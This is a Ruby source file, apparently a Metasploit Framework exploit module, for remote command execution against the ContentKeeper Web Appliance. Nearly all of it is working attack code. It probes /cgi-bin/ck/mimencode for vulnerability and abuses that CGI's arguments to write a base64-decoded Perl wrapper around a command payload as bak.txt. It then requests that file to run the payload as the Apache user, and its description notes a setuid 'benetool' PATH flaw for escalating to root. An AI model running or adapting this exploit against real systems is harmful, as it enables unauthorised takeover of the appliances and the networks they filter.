##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'ContentKeeper Web Remote Command Execution',
      'Description'  => %q{
        This module exploits the ContentKeeper Web Appliance. Versions prior
        to 125.10 are affected. This module exploits a combination of weaknesses
        to enable remote command execution as the Apache user. Following exploitation
        it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'
        to escalate to root.
      },
      'Author'   => [ 'patrick' ],
      'Arch'    => [ ARCH_CMD ],
      'License'       => MSF_LICENSE,
      'Version'       => '$Revision$',
      'References'    =>
      [
        [ 'OSVDB', '54551'],
        [ 'OSVDB', '54552'],
        [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
      ],
      'Privileged'    => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby telnet',
            }
        },      
      'Platform' => ['unix'],
      'Targets'  =>
      [
        [ 'Automatic', { } ]
      ],
      'DisclosureDate' => 'Feb 25 2009',
      'DefaultTarget' => 0))

      register_options(
      [
        Opt::RPORT(80),
      ],self.class)
  end

  def check
    connect
    sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
    banner = sock.get(-1,3)
    disconnect

    if (banner =~ /500 Internal/)
      return Exploit::CheckCode::Vulnerable
    end
      return Exploit::CheckCode::Safe
  end

  def exploit

    exp = "#!/usr/bin/perl\n"
    exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
    exp << "system(\""
    exp << payload.encoded.gsub('"', '\"')
    exp << "\");\n"

    body = Rex::Text.encode_base64(exp)

    connect

    sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n"
    sploit << "Host: #{datastore['RHOST']}\r\n"
    sploit << "Content-Length: #{body.length}\r\n\r\n"

    print_status("Uploading payload to target.")
    sock.put(sploit + body + "\r\n\r\n")
    disconnect

    sleep(5)
    print_status("Calling payload...")
    connect
    req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx
    req << "Host: #{datastore['RHOST']}\r\n"
    sock.put(req + "\r\n\r\n")

    handler
    disconnect
  end
end